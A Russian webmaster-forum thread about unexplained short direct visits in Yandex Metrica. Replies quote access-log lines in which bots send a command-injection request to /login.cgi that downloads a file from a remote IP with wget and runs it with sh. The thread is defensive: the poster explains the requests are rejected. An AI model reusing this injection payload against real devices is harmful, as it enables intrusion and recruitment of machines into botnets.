Откуда идет много прямых заходов по 5 сек?

Енот
Новичо́к, через «о́»
Регистрация
16 Июл 2018
Сообщения
111
#1
Что за ерунда может быть? Кто-то парсит мой сайт? Или что это?
посещения от 0 до 5 секунд, прямые переходы и все из Московской области.
 
Регистрация
15 Дек 2017
Сообщения
5,067
#2
Что за ерунда может быть? Кто-то парсит мой сайт? Или что это?
посещения от 0 до 5 секунд, прямые переходы и все из Московской области.
Сейчас в запросах только боты, которые пытаются либо пароль подобрать, либо загрузить вирус на сервер и исполнить его.

41.235.155.177 - - [05/Aug/2018:19:41:39 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.197.248.133 - - [05/Aug/2018:19:42:43 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
62.94.124.171 - - [05/Aug/2018:19:42:49 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.223.134.217 - - [05/Aug/2018:19:43:15 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.203.93.165 - - [05/Aug/2018:19:44:07 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.212.132.88 - - [05/Aug/2018:19:44:36 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.221.171.84 - - [05/Aug/2018:19:45:50 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
197.53.161.34 - - [05/Aug/2018:19:46:04 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
197.54.22.192 - - [05/Aug/2018:19:46:25 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
41.238.149.17 - - [05/Aug/2018:19:48:11 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"

Со всеми ими закрывается соединение (400), и они не должны в таком случае создавать нагрузку на канал.

Где Вы смотрите посещения?
 
Енот
Новичо́к, через «о́»
Регистрация
16 Июл 2018
Сообщения
111
#3
Сейчас в запросах только боты, которые пытаются либо пароль подобрать, либо загрузить вирус на сервер и исполнить его.

41.235.155.177 - - [05/Aug/2018:19:41:39 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.197.248.133 - - [05/Aug/2018:19:42:43 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
62.94.124.171 - - [05/Aug/2018:19:42:49 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.223.134.217 - - [05/Aug/2018:19:43:15 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.203.93.165 - - [05/Aug/2018:19:44:07 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.212.132.88 - - [05/Aug/2018:19:44:36 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.221.171.84 - - [05/Aug/2018:19:45:50 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
197.53.161.34 - - [05/Aug/2018:19:46:04 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
197.54.22.192 - - [05/Aug/2018:19:46:25 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
41.238.149.17 - - [05/Aug/2018:19:48:11 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"

Со всеми ими закрывается соединение (400), и они не должны в таком случае создавать нагрузку на канал.

Где Вы смотрите посещения?
в Яндекс Метрике смотрю
 
Енот
Новичо́к, через «о́»
Регистрация
16 Июл 2018
Сообщения
111
#4
Сейчас в запросах только боты, которые пытаются либо пароль подобрать, либо загрузить вирус на сервер и исполнить его.

41.235.155.177 - - [05/Aug/2018:19:41:39 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.197.248.133 - - [05/Aug/2018:19:42:43 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
62.94.124.171 - - [05/Aug/2018:19:42:49 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.223.134.217 - - [05/Aug/2018:19:43:15 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.203.93.165 - - [05/Aug/2018:19:44:07 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.212.132.88 - - [05/Aug/2018:19:44:36 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
156.221.171.84 - - [05/Aug/2018:19:45:50 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
197.53.161.34 - - [05/Aug/2018:19:46:04 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
197.54.22.192 - - [05/Aug/2018:19:46:25 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"
41.238.149.17 - - [05/Aug/2018:19:48:11 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0" "-"

Со всеми ими закрывается соединение (400), и они не должны в таком случае создавать нагрузку на канал.

Где Вы смотрите посещения?

Ну вот скрин примера такого вот посещения
2018-08-05_20-37-25.png
 

Вложения

Последнее редактирование:
Регистрация
15 Дек 2017
Сообщения
5,067
#5
Напишите в поддержку Яндекса, они точно ответят с чем связана такая статистика.